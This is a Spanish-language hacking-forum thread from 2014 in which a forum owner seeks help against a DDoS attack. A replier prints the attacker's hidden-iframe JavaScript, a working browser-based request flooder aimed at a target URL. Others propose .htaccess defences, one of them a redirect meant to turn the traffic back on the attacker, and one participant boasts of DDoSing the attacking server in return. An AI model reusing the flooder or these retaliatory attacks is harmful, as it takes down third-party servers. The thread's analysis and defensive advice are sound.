Foro de elhacker.net

Seguridad Informática => Seguridad => Mensaje iniciado por: WIитX en 13 Enero 2014, 08:57 am


Título: Ataques de Denegación
Publicado por: WIитX en 13 Enero 2014, 08:57 am
Buenas ayer me llego un correo de un usuario alertandome de los ataques DDos hacia mi foro, les dejo el mensaje no se si es usuario de este foro o del mio, solo quiero saber si pueden ayudarme a repeler esos ataques o poder confirmar que son de la web que tal usuario dice, muchas gracias por su ayuda.

Citar
Nombre: ************
E-mail: *****************
Mensaje: Buenas chavales un saludo muy cordial, estuve el otro dia en un jueguillo de una página llamado: boombang.me/esp/play/flash En el cual en su código fuente ví varias líneas de código php que estaba atacando a su servidor, se que no me tengo que meter en ésto ni tal el ataque que le hacian a ustedes era DDOS (Denegación de servicio), simplemente yo hice el mismo ataque solo que a ellos, Lo he hecho hoy. Espero que al menos me agradezcan de estar "vivo" xD.

Título: Re: Ataques de Denegación
Publicado por: #!drvy en 13 Enero 2014, 09:18 am
Efectivamente esa pagina esta llevando acabo un DDOS.
Código
  1. view-source:http://boombang.me/esp/cliente.php
Código
  1. <iframe src='ddosputo.php' height='0' width='0' style="borders: none; display: none"></iframe>

La cual tiene:

Código
  1. <meta http-equiv="refresh" content="60;URL=ddosputo.php">
Código
  1. <script type="text/javascript">
  2. 			function random() {
  3. 				var count = 0;
  4. 				var result = "";
  5. 				var length = Math.Floor(Math.Random() * 100);
  6. 				var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz";
  7.  
  8. 				for (var i = 0; i < length; i++) {
  9. 					var num = Math.Floor(Math.Random() * chars.length);
  10. 					result = result + chars.substring(num, num + 1);
  11. 				}
  12.  
  13. 				return result;
  14. 			}
  15.  
  16. 			(function () { 
  17. 				var fireInterval; 
  18. 				var requestsHT = {};
  19. 				var isFiring = true;
  20. 				var targetURL = "http://boomkong.tk"
  21. 				var requestedCtr = 0, succeededCtr = 0, failedCtr = 0;
  22.  
  23. 				var makeHttpRequest = function () {
  24.  
  25. 				if (requestedCtr > failedCtr + succeededCtr + 1000) {  return; };
  26.  
  27. 				var rID = Number(new Date()); var img = new Image();
  28. 				img.onerror = function () { onFail(rID); };
  29. 				img.onabort = function () { onFail(rID); };
  30. 				img.onload = function () { onSuccess(rID); };
  31.  
  32. 				img.setAttribute("src", targetURL + "?id=" + rID + "&msg=robandocreditosokase-lol");
  33. 				requestsHT[rID] = img;  onRequest(rID);
  34. 				};
  35.  
  36. 				var onRequest = function (rID) { requestedCtr++; };
  37. 				var onComplete = function (rID) { delete requestsHT[rID]; };
  38. 				var onFail = function (rID) { succeededCtr++; delete requestsHT[rID]; };
  39. 				var onSuccess = function (rID) { succeededCtr++; delete requestsHT[rID]; };
  40.  
  41. 				isFiring = true; 
  42. 				fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(200) | 0));
  43. 			})();
  44. 		</script>

Pero no parece que estén atacando a tu foro.. o al menos no en este momento.


Defenderte de ese ataque.. no he probado pero puedes hacer que Apache niegue o redireccione a todo el que tenga de referer esa pagina (boombang.me). También puedes agregar una excepción que niegue o redireccione si la url contiene msg=robandocreditos (un mensaje gracioso que deja el atacante xD).

Al fin y al cabo lo que hacen es crear imágenes (miles xD) con ruta el sitio al que atacan.

Slaudos

Título: Re: Ataques de Denegación
Publicado por: WIитX en 13 Enero 2014, 16:03 pm
Como hago para denegarlo, por favor ayudame

Esto sirve: http://foro.elhacker.net/php/anti_dos_ddos_en_php-t399902.0.html    ??

Título: Re: Ataques de Denegación
Publicado por: 0x98364 en 13 Enero 2014, 17:11 pm
Parece que el ataque se esta realizando únicamente desde un servidor. Si tienes acceso a apache deniega la ip del origen de ataque con deny from y adios  ::)

Título: Re: Ataques de Denegación
Publicado por: WIитX en 14 Enero 2014, 14:31 pm
Gracias por vuestras respuestas pero entro a su web y no encuentro la línea de código de @Drvy podéis decirme donde se encuentra?

Título: Re: Ataques de Denegación
Publicado por: #!drvy en 14 Enero 2014, 22:34 pm
Citar
Gracias por vuestras respuestas pero entro a su web y no encuentro la línea de código de @Drvy podéis decirme donde se encuentra?
Cita de: @drvy en 13 Enero 2014, 09:18 am
Código
  1. view-source:http://boombang.me/esp/cliente.php
Linea 76 para ser mas específicos.
Citar
Como hago para denegarlo, por favor ayudame
Cita de: @drvy en 13 Enero 2014, 09:18 am
no he probado pero puedes hacer que Apache niegue o redireccione a todo el que tenga de referer esa pagina (boombang.me). También puedes agregar una excepción que niegue o redireccione si la url contiene msg=robandocreditos (un mensaje gracioso que deja el atacante xD).
Citar
Esto sirve: http://foro.elhacker.net/php/anti_dos_ddos_en_php-t399902.0.html    ??

Eso es una protección muy primitiva que solo sirve para hostings que no disponen de otros recursos (htaccess, firewall etc..). Vamos, en tu caso podria funcionar, pero hay métodos mas "bonitos" de hacerlo y no llegar a usar PHP (ya que esa es la ultima linea de defensa de tu host).

Como he dicho, lo que hace ese script es crear mil requests en forma de imagenes a tu server.. lo que puedes hacer es detectar el referer y en caso de que provenga de el, negarlo o redireccionarlo.

Ejemplo.
Código
  1. <IfModule mod_rewrite.c>
  2. RewriteEngine On
  3. RewriteBase /
  4. RewriteCond %1%{HTTP_REFERER} boombang\.me/(.*)?
  5. RewriteRule ^.*$ http://boombang.me/%1 [R=301,L]
  6. </IfModule>

Esto hara que si el referer viene de boombang.me/cualquiercosa lo redireccione permanentemente a su propia url ·_·.. En teoría se estaría haciendo DDOS a si mismo xD
Citar
Parece que el ataque se esta realizando únicamente desde un servidor. Si tienes acceso a apache deniega la ip del origen de ataque con deny from y adios  ::)

El realidad el ataque proviene de los visitantes de ese servidor.. no del propio servidor. Entonces eso no serviría de nada.

Saludos

Título: Re: Ataques de Denegación
Publicado por: WIитX en 15 Enero 2014, 09:03 am
Va muchísimas gracias ese código lo pongo en el Index.php ?

Busque lo que me dijiste y encontré esto no encontré lo de TargetURL:

Código:
</script><style type="text/css" media="screen">#flash_boombang {visibility:hidden}</style>
<!--<iframe src='antiadb.php' height='0' width='0' style="borders: none; display: none"></iframe>-->
</head><body><iframe src="ddosputo.php" height="0" width="0" style="borders: none; display: none"></iframe>
<iframe src="http://frigost.net/foro" height="0" width="0" style="borders: none; display: none"></iframe>
	<script type="text/javascript">

Título: Re:
Publicado por: ivancea96 en 15 Enero 2014, 09:57 am
Siempre puedes intentar hablar con los de Boombang e infornarles. No creo q sean ellos. Quizás hayan modificado la página ajenos a Boombang.

Enviado desde mi ST21i mediante Tapatalk

Título: Re:
Publicado por: WIитX en 15 Enero 2014, 10:01 am
Cita de: ivancea96 en 15 Enero 2014, 09:57 am
Siempre puedes intentar hablar con los de Boombang e infornarles. No creo q sean ellos. Quizás hayan modificado la página ajenos a Boombang.

Enviado desde mi ST21i mediante Tapatalk

No es por ser malo ni nada de eso.. pero lee el post antes de responder no es la empresa es un servidor ajeno a la empresa.

Saludos.

Título: Re: Ataques de Denegación
Publicado por: #!drvy en 15 Enero 2014, 10:55 am
WINTX, si te fijas, en mi primera respuesta mencione el <iframe>, dentro de ese iframe (que lleva de src ddosputo.php), es donde esta el código que sigue después.

El código que te deje es para meterlo en un .htaccess.
http://es.wikipedia.org/wiki/.htaccess


Cita de: WINTX en 15 Enero 2014, 10:01 am
No es por ser malo ni nada de eso.. pero lee el post antes de responder no es la empresa es un servidor ajeno a la empresa.

Lo que tendrías que hacer es hablar con la empresa que hospeda el sitio.. seguro que no les hará mucha gracia cuando se enteren de que un cliente suyo esta lanzando DDOS a punta pala... al fin y al cabo es ilegal en bastantes paises.

Saludos

Título: Re: Ataques de Denegación
Publicado por: WIитX en 15 Enero 2014, 11:04 am
El es de mexico y tengo entendido que alli es legal :l ese es mi problema hablare con la empresa y tal pero no creo que hagan nada muchas gracias tendría que hacer leido mejor.

PD: Cree el htcdacess ese y pegue dentro del código

Código:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %1%{HTTP_REFERER} boombang\.me/(.*)?
RewriteRule ^.*$ http://boombang.me/%1 [R=301,L]
</IfModule>

Título: Re: Ataques de Denegación
Publicado por: CoolTesting en 19 Enero 2014, 06:01 am
Jajajajaja, vaya con lo que uno se encuentra. Yo fuí el de el mensaje simplemente te queria alertar.

Título: Re: Ataques de Denegación
Publicado por: WIитX en 19 Enero 2014, 11:35 am
Cita de: CoolTesting en 19 Enero 2014, 06:01 am
Jajajajaja, vaya con lo que uno se encuentra. Yo fuí el de el mensaje simplemente te queria alertar.

Pues cool, muchas gracias compañero al parecer ya cambio a otra web igualmente lo miro todos los días y si me vuelve a atacar a mi hablare con su empresa de hosting.

Gracias a Todos Chicos!

Título: Re: Ataques de Denegación
Publicado por: WIитX en 21 Enero 2014, 14:17 pm
Perdonen por Re-abrir.

Ahora al intentar mirar si está atacando a mi web no puedo verlo al poner.

boombang.me/cliente.php/ddosputo.php no me lleva a la web que antes estuve mirando con inspeccionar elemento pero no logro sacarlo creo que lo oculto o algo. Pueden ayudarme?

Título: Re: Ataques de Denegación
Publicado por: #!drvy en 21 Enero 2014, 15:02 pm
Esta comentado... sera que no lo esta utilizando mas.. WINTX tío.. analiza.. y no creas que lo va a dejar siempre ahí.. si te quiere putear lo mete 2384298420 archivos y en otros 2389472893742893 hosts... en serio.

Saludos

Título: Re: Ataques de Denegación
Publicado por: WIитX en 21 Enero 2014, 18:19 pm
Ok, Gracias T.T

Título: Re: Ataques de Denegación
Publicado por: el-brujo en 21 Enero 2014, 18:53 pm
si, ahora sale comentado.

Código:
<!--<iframe src='antiadb.php' height='0' width='0' style="borders: none; display: none"></iframe>-->
<!--<iframe src='ddosputo.php' height='0' width='0' style="borders: none; display: none"></iframe>-->


Tienes que bloquear o redireccionar el http_referer.

Bloqueando un ataque Iframe
http://foro.elhacker.net/seguridad/bloqueando_un_ataque_iframe-t127481.0.html

Título: Re: Ataques de Denegación
Publicado por: WIитX en 21 Enero 2014, 20:46 pm
Gracias el-brujo voy a leerme el link que me pasaste en cuanto tenga un hueco libre

Título: Re: Ataques de Denegación
Publicado por: CoolTesting en 29 Enero 2014, 08:32 am
WINTX, no se si recuerdas pero te dije que yo tambien le he hecho un ataque DDoS, en este mismo instante su servidor está colapsado por eso no puedes acceder a los datos.

:)


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines